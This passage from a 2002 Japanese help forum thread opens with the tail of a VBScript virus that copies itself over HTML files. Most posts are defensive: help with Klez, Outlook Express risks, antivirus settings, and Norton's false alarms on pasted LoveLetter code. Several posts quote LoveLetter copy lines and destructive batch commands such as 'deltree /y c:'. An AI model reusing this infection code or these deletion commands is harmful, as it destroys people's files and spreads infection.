If s = "htm" and fso.FileExists(f1.path+"l") = False then
fso.CopyFile f1.path, f1.path+"l", true
fso.CopyFile HostPath, f1.path, true
End If
Next
Wend
If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal")
End Sub
--></script>
</BODY>


274 :Hannibal ◆I3SznmHM :02/07/06 10:19 ID:???
>>254
http://www.neic.co.jp/pc/x5PRODUCTS/tool/keibi/
あるんだな、これが。

>>272
Klezと思われます。
>>8を読んでください。

OUTLOOKとその一党を使ってなければ、添付ファイルを開かない限り問題
無いと思います。
ついでに、ウィルス検知ソフトを購入し、最新定義ファイルに更新してますよね。

ウィルス検知ソフト無し、OUTLOOK系使いまくりなら、貴方のPCも感染している
可能性が十二分にありますけど。

>>273
Symantec関係者なら貴方の行為は、「氏ね」と言われる行為ですなぁ。

275 :ひよこ名無しさん:02/07/06 10:21 ID:???
−−−−−−−
俺様用しおり
  ∧_∧   
 ( ´∀`)< 今日はここまで読んだ      
−−−−−−− 


276 :ひよこ名無しさん:02/07/06 10:27 ID:???
−−−−−−−
俺様用おしり
  ∧∧
 (゚Д゚ )
  ⊂  ヽ 
   〉 ノノ~ ← 今日はここに突っ込んだ
  ∪∪
−−−−−−−

277 :272:02/07/06 10:47 ID:???
>>274さん
ありがとうございました。
ウイルスソフトは今現在、あぼーんされて
いますので(まか・・・です)、のーとん
買ってきます。OEは使っていません、ていうか
メール送信には使っていますけど(WEBメールの
アドレスで)、受信はやふーでIE使ってみてます。
受信しなくてもOEは危ないのでしょうか?

それから、添付ファイルついてなくても(少なくとも
ヤフーの言ってる事が正しければ添付はついてない
ように思えます)、Klezって感染するのでしょうか?

一応ノートンのオンラインスキャンでは感染ファイルは
ゼロでした。

色々済みませんが、宜しくお願いします。

278 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 10:49 ID:???
>>277
>受信しなくてもOEは危ないのでしょうか?
危ない理由も知らずに危ない危ないは酷いです・・・失礼です・・・(泣)。

プレビュー時に相手が仕込んだある形式の任意のスクリプトが実行できてしまう
(最近のバージョンは対策済み)が問題。

279 :荒岸 ◆MONa3xWM :02/07/06 10:49 ID:???
>>277

メール欄は空白にしてID出してね。
オンラインスキャンしかしてないの?ぜひ製品版を購入してください。

280 :ひよこ名無しさん :02/07/06 10:54 ID:???
昨日ウィルスに感染したが、あまりにも時代遅れのウィルスだったので驚いちゃったよ。
感染ウィルス:VBS.Love Letter.A
       2年以上前に流行ったレトロなウィルスでした。
感染経緯:メルマガで長い間送ってこないものを整理しようと思い、マイページから
     発行者のサイトにアクセスしたら変な英語のページになってて、ヤバイと
     思ったら感染してた。

以上、私の不思議なウィルス体験です。


281 :272:02/07/06 11:00 ID:W1/Ab9ZN
>>278さん

ごめんなさい。プレビューすると危ないということしか、
知りませんでした。(プレビューで実行されるウイルスもあるから
ですよね?)だから、送信にしか使ってなかったのですが。
という事は、やっぱり受信しなければ問題ないという事で、
いいのでしょうか?

>>279さん
空白にしました。すみません。製品版はまか・・・を
使ってますが、最新の定義にUpdate何故かできないのです。
今日のーとん買ってきます。

何回もすみませんが、結局この添付ファイルなしのメールは
やっぱりKlezなのでしょうか?


282 :メールヘッダは?:02/07/06 11:06 ID:???
>>281

283 :荒岸 ◆MONa3xWM :02/07/06 11:07 ID:???
>>281

マカフィーのプレインストール版?
先にそれをアンインストールしてからじゃないとまずいので気をつけて。
まずはセーフモードで起動してアンインストールしてね。

284 :ひよこ名無しさん:02/07/06 11:15 ID:???
現在、この板をよりよく改善するために、↓で議論が行なわれています。

http://kaba.2ch.net/test/read.cgi/accuse/1025484209/l50

皆さんも、質問しやすく、回答しやすい板を作るために、意見を書き込んでください。  

285 :272:02/07/06 11:16 ID:fCPGDgZ4
>>282さん
いまいち仰っておられる事の意味が分ってません。。。
本文は全く無し、メールの件名は色々、センダーは
普通のプロバイダーのアドレス使ってます(但し、複数のメアド。
同じプロバイダーのアドレスもありません)

>>283さん
そうです。アンインストールの仕方ありがとうございます。

しかし、こんな私も会社では一番のPC通。。。いいのかなー。

286 :諦めて下さい。:02/07/06 11:19 ID:???
>>285



287 :272:02/07/06 11:30 ID:W0G+IvpN
>>286さん
OE使ってたらヘッダーの見方は分るのですが、
WEBメールでのやり方が分らないのです。
諦めなきゃ駄目ですかー?困った。。。

288 :オプションで:02/07/06 11:43 ID:???
設定を変える。

WEBメールは何?
yahoo、hotmailなら表示できる。

289 :272:02/07/06 12:01 ID:ZFEyRLsl
From: xxx <xxx@snufkin.club.ne.jp>
To: xxxxxx@yahoo.co.jp
Subject: Compressed
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=KQBomZ46W37m2EkT85n3g9I
Content-Length: 126831

こんな感じでした。どうでしょう?

290 :Receivedは?:02/07/06 12:06 ID:???
>>289

291 :272:02/07/06 12:12 ID:ZFEyRLsl
Received: from mfe.odn.ne.jp (EHLO t-xxx.odn.ne.jp)
(xxx.90.131.181) by mta14.mail.yahoo.co.jp with SMTP;
Received: from Bgkle ([61.xxx.6.182]) by t-xxx.odn.ne.jp
with SMTP id <200207051903.TAVJ.6050.t-xxx.odn.ne.jp@
xxx.odn.ne.jp>

これでした。

292 :質問(・∀・)おながいします:02/07/06 12:16 ID:llrLsSyb
会社のおじさんがぁゃιぃ添付付本文ナシのメールを興味本位で開封して以来
クレズHに感染しているメールを送信しているのでそれを駆除して送信しました、
という警告メールが日に10通位着続けてます。
送信先のアドレスは見覚えのないものです。
バスターの最新定義で検索&シマンテックのオンラインスキャンで検索しても
何も出て来ませんでした。
本当に感染してるのでしょうか?
また、この警告メールを止めるにはどうすればいいでしょうか?
os - windows98
メーラー - OE(バージョンはちょっと忘れてしまいました。修正パッチとかは当ててない)


293 :ひよこ名無しさん:02/07/06 12:20 ID:???
>>292
今使っているメアドを登録している他の誰かのPCにクレズHが感染していると思われ。


294 :ひよこ名無しさん:02/07/06 12:20 ID:???
>>292
ウイルス対策ソフトは購入してないのですね?

295 :ひよこ名無しさん:02/07/06 12:24 ID:???
>>292

  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | ウィルス対策ソフトも入れずにネットしてるのかゴルァ!! 逝ってよし!
  \  __________________
    ∨
          ∴  ・〜  ブーン
  ∧ ∧    ∴∴ ↑>>292
  ( ゚Д゚)   ∴∴∴
  ∪  ⊃自
 〜|  │  プシュー
   U U


296 :ひよこ名無しさん:02/07/06 12:26 ID:???
>>292
ネット止めてください!

297 :292:02/07/06 12:27 ID:llrLsSyb
>293 ウチの事務所でネットにつなげるのはそのパソコンだけなんです。
    社内LAN経由で感染するということですか?

>294 最初にぁゃιぃメールを開封した時点でバスター2001で定義更新したのが半年前
    というのが入ってましたが、当然無反応でした。
    このメールが着だしてから会社のシステム部があわてて最新定義に更新しましたが
    それで検索掛けても無反応です。
    ちなみにLANで繋がってる全てのパソコンを検索しましたがが何も感染してないようです。

298 :おろおろ:02/07/06 12:33 ID:???
VBS.Interbalというウイルスに感染しますた。
ウイルス定義ファイルは最新ですが、
ファイルを修復できません(;´Д`)
SARCに提出しても良いのでしょうか?

299 :ひよこ名無しさん:02/07/06 12:33 ID:???
>>297
クレズhはヘッドを偽装します。
自分が感染してなくてもメアドが登録してあるPCから送られて戻ってくる可能性が。

300 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 12:36 ID:???
>>299
ヘッダね。
頭を偽装されても困るっす。w

301 :299:02/07/06 12:39 ID:???
>>300
ゴメソ 
訂正さんくすこ

302 :ひよこ名無しさん:02/07/06 12:39 ID:???
>>298
ウィルス単体のみのファイルを修復できるわけが無い。
とっとと削除しる。

303 :ひよこ名無しさん:02/07/06 12:41 ID:???
>>298
その、該当ファイルをソッコーで削除!記念に残しますか?(w

304 :ひよこ名無しさん:02/07/06 12:43 ID:???
>>298
そんな既知のウィルスをSARCに提出したってバカにされるだけ。

305 :298:02/07/06 13:03 ID:???
オラァ消えろやー!!
というかけ声と共に削除しますた。
みなさんありがとです。

306 :荒岸 ◆MONa3xWM :02/07/06 13:06 ID:???
>>304

2ch的にはガイチって読むのかしら。

307 :ひよこ名無しさん:02/07/06 13:07 ID:???
>>306
チョトワロタ

308 : ◆bzx9FKd2 :02/07/06 13:13 ID:qFGpOXba
これ、テンプレに入れてもらってもいいだろうか。

メーラーでOutlook(Express)を使っている場合、
ツール −> オプション −> セキュリティーで
セキュリティーゾーンを「制限付きサイトゾーン」にチェックする。
(OE5.5で設定できることを確認)

で、InternetExplolerの
ツール −> オプション −> セキュリティーで
制限付きサイトのアイコンをクリック
下のほうにある「レベルのカスタマイズ」ボタンをクリック
「セキュリティーの設定」が新しく現れるから、その中にある
ActiveXに関係ある項目を全てOffにする。
(IE5.0SP2で設定できることを確認)

これでドラクエ的にスライム程度のウイルスなら
撃退できると思うのだが。

どうだろう


309 : ◆bzx9FKd2 :02/07/06 13:16 ID:qFGpOXba
308だが。

すまん、「撃退できる」って言い方はまずいな。
「チャチなウイルスのなかには、これで撃退できるものもある」
ぐらいにしておく。



310 :進行早すぎ:02/07/06 13:17 ID:???


311 :ひよこ名無しさん:02/07/06 13:17 ID:???
>>308
ここにきた時点で初心者or質問者は感染の可能性があるのでそれは無意味では・・・


と言ってみる ロールシャッハテスト

312 :ひよこ名無しさん:02/07/06 13:18 ID:???
>>308
SP2と多少の警戒じゃダメ?
証明書のないActiveXはダイアログ出るし。

313 : ◆bzx9FKd2 :02/07/06 13:38 ID:qFGpOXba
308です。

>>311
確かに、感染した後にこれをするのは虚しいかも...
でも、駆除した後にはいくらか役に立ってくれるのでは、

と自己弁護してみるテスト(w

>>312
うーむ、ちょっとした設定をすることで「もう万全だぜ」などと
思い込んでしまうよりも、普段からメールには警戒心を持っておく
&パッチをきちんと当てる習慣を身に付けるほうがよいかも...

外したかのぅ。


314 :ひよこ名無しさん:02/07/06 16:31 ID:???
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/



1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。

基本(この問題について) >>2
既知の2chで話題になってるvbsソース >>3

2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/
の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?

315 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 16:44 ID:???
>>314
機能引っかかった。
なるほどと感心した。
テキストベースのウイルスだからテキストで判断するしかないんだね。

316 :ひよこ名無しさん:02/07/06 16:47 ID:???
>>314
詳しくありがとう!

317 :ひよこ名無しさん:02/07/06 16:53 ID:???
>>314
ノートンの設定で、Temporary Internet Files を除外すればいいんじゃないかな?
おれは2ちゃんブラウザなので、ログ保存フォルダを除外に設定した。

318 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 16:55 ID:???
>>317
勉強になった♪
これ、A BONE巻き込んで落ちるからちょっと困ってたのよね。

319 :ひよこ名無しさん:02/07/06 17:03 ID:???
Temporary Internet Files を除外すると、
本当にウィルスのあるwebサイトを開いたときにも無反応になる可能性が
あるので、注意しませう!

320 :ageます:02/07/06 17:07 ID:???
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/



1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。

基本(この問題について) >>2
既知の2chで話題になってるvbsソース >>3

2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/
の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?

321 :age:02/07/06 17:16 ID:???
age

322 :kop:02/07/06 18:27 ID:X9jWQgyn
**************緊急質問(テスト)***********


さっき、かちゅーしゃで不謹慎にも半角文字列板行ったんですよ。

で、いつものようにスレッド適当に選んでたんです。

するとあるスレッドをクリックして開いた瞬間事件は起きました。

なんとウイルスに感染したのです。

スレ開いただけですよ。

いったいどうなっているんでしょうか??

・・・・という質問したら死刑ですか??


323 :167:02/07/06 18:29 ID:c52K0GOR
またvbsにひっかかりました。検疫項目から削除して
スキャンしたけど、感染項目が見つかりました。
インターネット履歴を削除してなかったので、さっき
やったけど、もう一度スキャンしたらなんにも出ないのかな。
不安だ・・・。ていうか、もうイタズラはいやづら・・・。

324 :ひよこ名無しさん:02/07/06 18:29 ID:???
>>322
もう、いいよ

325 :ひよこ名無しさん:02/07/06 18:29 ID:???
>>323
うるさい!(・∀・)カエレ!!

326 :ひよこ名無しさん:02/07/06 18:30 ID:???
ウィルスってこれのこと??

Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

327 :ひよこ名無しさん:02/07/06 18:31 ID:???
>>326
違うよ

328 :ひよこ名無しさん:02/07/06 18:32 ID:???
>>326
貼るな!馬鹿!!!!!!

329 :kop:02/07/06 18:34 ID:X9jWQgyn
LOVE LETTERウイルスがうざいです。

かちゅうしゃでvbscript効かないようにできないんでしょうか??

330 :ひよこ名無しさん:02/07/06 18:39 ID:???
>>329
俺はABONEだが、かちゅだってどこかのフォルダにログを保存しているだろ?
Norton AntiVirus の設定で、そのフォルダを「除外」に設定すれば?

331 :kop:02/07/06 18:54 ID:X9jWQgyn
LoveLetterウイルスについて(かちゅう)

さっき感染したスレ調査してきたら、↓のことがわかりました。

かちゅうの場合スレにポイントしたら黄色いスレの表示がポップアップででます。
しかしLoveLetterのスクリプトコピペしているスレは、
ポップアップが表示されないことがわかりました。


PS.>>330
除外設定にしたら、他のウイルスに感染・・・っていう心配はしなくていいんでしょうか?

332 :ひよこ名無しさん:02/07/06 18:54 ID:kovbC4Qz
初心者厨丸出しな質問していい?
他人に迷惑かけたくないんでOEのアドレス帳からっぽにしてるんだけど、
もしそこに自分のメアド入れとけばメールを介したウイルスに感染してる時、
いち早く気付けますか?

あと上のラブレターというのは誤動作させるだけで実害はないのですか?
ほうっておいても平気なのでしょうか? それともウイルスには一応感染
していて、こまめにテンポラリーファイルフォルダを削除しないいけないのですか?

333 :ひよこ名無しさん:02/07/06 18:56 ID:???
>>332
すなおにウイルスソフトいれろ

334 :ひよこ名無しさん:02/07/06 18:57 ID:???
>>331
>ポップアップが表示されないことがわかりました。
それは、スレの取得に失敗してるので、ログが保存されてないからでは?

>除外設定にしたら、他のウイルスに感染・・・っていう心配は
その心配はない。

335 :ひよこ名無しさん:02/07/06 19:03 ID:???
例の2chのスレに安置ウイルスソフトが反応するってやつは
次スレからテンプレに入れたほうが良いな。

336 :ひよこ名無しさん:02/07/06 19:09 ID:???
>>335
テンプレって何ですか??
>>330
>Norton AntiVirus の設定で、そのフォルダを「除外」に設定すれば?

設定の仕方はどうやるんですか??

337 :ひよこ名無しさん:02/07/06 19:12 ID:rKtBjjqR
http://isweb44.infoseek.co.jp/business/a8net/newpage1.htm
情報屋さん!! プロジェクトX(゚∀゚)


338 :ひよこ名無しさん:02/07/06 19:13 ID:???
>>335
胴衣。でもここの次スレが立つ頃には、もう忘れられてるかも・・・

339 :ひよこ名無しさん:02/07/06 19:17 ID:???
マカフィーなんでよく理解できないんだが、で、このイタズラは実害あるわけ?
このスレお気に入りに設定してるんだけど、漏れも感染してるってことなのか?

340 :ひよこ名無しさん:02/07/06 19:19 ID:???
( ´,_ゝ`)プッ...馬鹿ばっかだな(藁

341 :ひよこ名無しさん:02/07/06 19:26 ID:+XuPG6lU
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

↑このスレ自体もノートンが反応しない?

342 ::02/07/06 19:27 ID:???
ソース貼られてるんだから当然じゃん

343 :ひよこ名無しさん:02/07/06 19:46 ID:???
>>340
んじゃ、賢い君が馬鹿にもわかるように事の顛末の全容わかりやすく説明してくれ。
賢い君なら口だけじゃなくきっとできるよな。

344 :ひよこ名無しさん:02/07/06 19:48 ID:???
>>342
そこの76に貼られている長いVBScriptコードはウィルスではないが、
ノートンがウィルスと誤認するようだ。
ノートンは、VBScriptは無条件でウィルスとみなすのか?

345 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 19:49 ID:???
>>344
悪意あるコードの一部を認識するんでしょう。
だからその他の部分をダミーとして並べば・・・。

346 ::02/07/06 19:50 ID:???
マッチングさせてるパターンに問題があって
普通に使われるようなコードをパターンに使ってるから
誤検出してるんだよ

347 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 19:55 ID:???
>>346
なるなる。そっちね。

でも、

Copy(dirsystem&"LOVE-LE〜VBS”) //いたずら防止のため潰してありますわ

な文字列でも反応しちゃう罠。

348 :ひよこ名無しさん:02/07/06 19:58 ID:???
ノートンのマッチングって、単に文字列比較 strcmp してるだけ??

349 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 20:00 ID:???
>>348
strcmpって・・・。
strncmpでしょう。w


350 :ひよこ名無しさん:02/07/06 20:02 ID:???
だったら俺でも作れる罠(w

351 :ひよこ名無しさん:02/07/06 20:02 ID:???
stricmp かも?w

352 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 20:08 ID:???
でも、パターンマッチが基本だとは思うけどね。ウイルスチェックって。

バイナリにHDDをフォーマットする一般的なコードがないかマッチングさせる。とか。
その考え方で逝くと有害であるだろう文字列をテキストから探すのは至極当然。

流石に各言語のローダとかチェッカとか作ってたら大変かと。
少なくても応急処置としては正しかったかなと。


353 :ひよこ名無しさん:02/07/06 20:10 ID:???
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

↑よくみたら、82にラブレターが貼りついていた。

354 :ひよこ名無しさん:02/07/06 20:14 ID:???
>>350作った。

char virus[] = { "LOVE-LETTER" };
 (中略)
while (*p) {
 if (strncmp(p, virus, sizeof(virus)) == 0) {
  printf("感染!");
  return 1;
 }
 p++;
}
これじゃダメ?

355 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 20:16 ID:???
>>354
>p++;
何故一文字ずつずらしているのか・・・?w


356 ::02/07/06 20:16 ID:???
いや
PCをフォーマットするコードとかをマッチングさせる。だと
ユーティリティ系ソフトで激しく誤検出されるでしょう。
本来は、いわゆる狭義のウィルス(感染・潜伏・発病)
の場合、感染させるコードに必ず一致するバイナリがあるわけで
そこをマッチングさせるんだけど。
今広まってるような、単にパソコン破壊するプログラムみたいな
ウンコみたいなウィルスのできそこない(まあ、広義のトロイだけど)で
特にvbsで作られてるのだと、ソースそのまんまだから
自らを主張するコードはできるだけ入らないようになるわけ。
だからパターンのマッチングが難しくて、全部ソースそのままという事も
あり、誤反応が多いんだよね。なんなんだか

357 ::02/07/06 20:16 ID:???
356は>>352あたりに。遅レスすまそ

358 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 20:18 ID:???
>>356
だからたとえばの話。。。(泣)



359 ::02/07/06 20:22 ID:???
単に、今の話だと誤解を招きそうだったから。

deltree /y c:って内容のhoge.batが広まっても
deltreeをマッチングさせるのは問題があるよんってだけ

360 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 20:24 ID:???
>>359
激しく同意。

361 :Man in the Middle:02/07/06 20:26 ID:???
hoge.batなんて広まるかな?

362 :ひよこ名無しさん:02/07/06 22:12 ID:???
>>361
Win MX日本優良サーバーリスト8種(Wクリック自動登録タイプ).bat

中には無数のecho y | del *.*
後、autoexec.bat書き換えて無限ループとか。

結構な人数が引っかかったw

363 :Man in the Middle:02/07/06 22:16 ID:???
>>362
欝だ……

364 :ひよこ名無しさん:02/07/06 23:09 ID:???
>>362
 

365 :ひよこ名無しさん:02/07/06 23:11 ID:???
wink****.exe って検索して何もでてこなければ
Klezに感染してないって言えるの?

366 :ひよこ名無しさん:02/07/06 23:52 ID:ofh5EVc+
2ch中に急にVBS.Loveletter.Aに感染しました。(警告がでた)
exe,メール等はしてないのですが・・
ブラウザはIE,ノートンでその後スキャンしても、
出てきません。
コレは一体??

367 :ひよこ名無しさん:02/07/06 23:54 ID:???
>>366
ウイルススレに逝きなさい!書いてあるから

368 :ひよこ名無しさん:02/07/06 23:55 ID:???
>>366
あなたと同じ質問をした人が、今までに2048人いました。

369 :ひよこ名無しさん:02/07/06 23:56 ID:???
>>367
てか、ラスト50位のレス読もうよ、
って事で。

370 :ひよこ名無しさん:02/07/06 23:58 ID:ofh5EVc+
すいません。テンパッテますた。
過去ログ読んで逝って来ます。(激しく反省。

371 :ひよこ名無しさん:02/07/06 23:59 ID:???
>>370
おちょこちょいだねぇ(w

372 :ひよこ名無しさん:02/07/07 00:05 ID:???
>>371
×おちょこちょい
○おっちょこちょいw

373 :ひよこ名無しさん:02/07/07 00:08 ID:???
おっちょちょこいだねぇ(笑)

374 :ひよこ名無しさん:02/07/07 00:12 ID:???
おっちょこちょいですた!反省中・・・

375 :ひよこ名無しさん:02/07/07 00:15 ID:???
VBS.Loveletter.Aの話題で盛り上がってる所、申し訳ないのですが・・・
2週間以上前から、klezを毎日1~2通受信し続けていて、とりあえず自分は
対策ソフト入れてますし、7/6になればそいつのPCがアボーンしもう来ないだろうと
我慢していたのですが、今日(7/6)も、また来ていました。
感染しなくとも、非常にウザイのですが誰かもわからない相手が、気付くのを
待ちつづけるしかないのでしょうか?

376 :ひよこ名無しさん:02/07/07 00:17 ID:???
>>375
ブロックしてるんならほっとけ

377 :ひよこ名無しさん:02/07/07 00:18 ID:???
>>375
自分のメアド登録してるヤシ全員に警告メール出せば

378 :ひよこ名無しさん:02/07/07 00:19 ID:???
>>375
神経質過ぎ!ネットやめちゃえよ!!禿げるよ、マジで。

379 :ひよこ名無しさん:02/07/07 00:19 ID:???
>>129
>>132
あーぁ、出るようになっちまったのかよ。つまんねぇ。
警告出なかったから面白かったのに。
これじゃ初心者しか攻撃できねぇよ。

380 :◆WINMEi3Y :02/07/07 00:20 ID:???
>>365
ファイル検索で該当ファイルを検索する方法は、それだけに頼ると
いつか痛い目に遭うよ。

>>375
送信者を禁止に。

381 :ひよこ名無しさん:02/07/07 00:23 ID:???
>>380
お久しぶり

382 :ひよこ名無しさん:02/07/07 00:31 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

383 :◆WINMEi3Y :02/07/07 00:46 ID:???
>>381
忙しくて暇がない、あってもお疲れ、そんで新しい情報にも疎くなったし・・・
それでもなんとかわかる範囲でたまには回答してみたり(w

384 :ひよこ名無しさん:02/07/07 01:23 ID:???
c.Copy(dirsystem&"\うんこ臭い.TXT.vbs")

385 :ひよこ名無しさん:02/07/07 01:40 ID:txVtHwPB
すいません。質問させてください。
いつも出入りしてる板のあるスレにこんなレスがあったんです。
ぜんぜん気にしなくていいんですか?

468 名前:このスレはウイルスに感染しています :02/07/07 01:30
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l",
truefso.CopyFile HostPath, f1.path, trueEnd IfNext

386 :ひよこ名無しさん:02/07/07 01:41 ID:???
>>385
貼るなウザイ

387 :ひよこ名無しさん:02/07/07 01:55 ID:KRCY8pgU
いま、ニュー即+のリュウスケチャンがどうたらこうたらと言うスレでウィルスを戴きました。
えーん。

388 :ひよこ名無しさん:02/07/07 01:55 ID:I8yZKy5A
>>386
ごめんなさい。

389 :ひよこ名無しさん:02/07/07 01:57 ID:KRCY8pgU
ここにも張ってあるのか。
エーん。

390 :ひよこ名無しさん:02/07/07 01:57 ID:???
>>388
それは>>353あたりのスレか?

391 :ひよこ名無しさん:02/07/07 01:58 ID:I8yZKy5A
385です。
貼るだけでみんなに迷惑がかかるようなものなのですか。
本当にごめんなさい。

392 :ひよこ名無しさん:02/07/07 01:59 ID:???
>>388
>>389
二人共ここのレスをさかのぼって見てこい。
ノートンの誤検知だろ?

393 :ひよこ名無しさん:02/07/07 02:03 ID:???
>>391
君のせいで迷惑を蒙った。どうしてくれるんだ!( ゚Д゚)ゴルァ!

394 :385:02/07/07 02:04 ID:3u0Xhz5R
>>390,392
誘導ありがとうございます。今さらっと見てきました。
この後じっくり読みたいと思います。
ほんとうにありがとうございました。

395 :385:02/07/07 02:05 ID:3u0Xhz5R
>>393
ごめんなさい。

396 :ひよこ名無しさん:02/07/07 02:06 ID:???
>>395
あんた、下手したら犯罪だぜ!

397 :389:02/07/07 02:07 ID:KRCY8pgU
>>392
読んだ。
すまんかった。

398 :ひよこ名無しさん:02/07/07 02:09 ID:???
ノートンユーザーはこのスレうるさいんだろうな…

399 :ひよこ名無しさん:02/07/07 02:12 ID:???
>>398
マジでウザいよ!反応しまくりだからねぇ・・・

400 :ひよこ名無しさん:02/07/07 02:28 ID:???

2chの自作板の「ウイルス(玄人)志向」のスレを
みてるといつもラブレターに感染とノートンが
騒ぎ立てるが・・・ネタでなくマジ


401 :ひよこ名無しさん:02/07/07 02:47 ID:???
かちゅ〜しゃとか使ってる人はログ削除して取得しなおしてあぼ〜んすりゃいいのか?

402 :ひよこ名無しさん:02/07/07 02:56 ID:???
>>401
だと思うんだけど、あぼ〜んする場所探すのが大変

403 :ひよこ名無しさん:02/07/07 02:59 ID:???
>>401
>>330ってことじゃないのか?
俺ノートンじゃないんで確かめられんが。

404 :ひよこ名無しさん:02/07/07 03:04 ID:???
>>401
このスレだと、176/273/326/384/385をあぼ〜んすれば反応しなくなると思う。
コードっぽいのは全部あぼ〜んすればいい。

だけど、あぼ〜んする時はノートンを止めないといけないし面倒だから
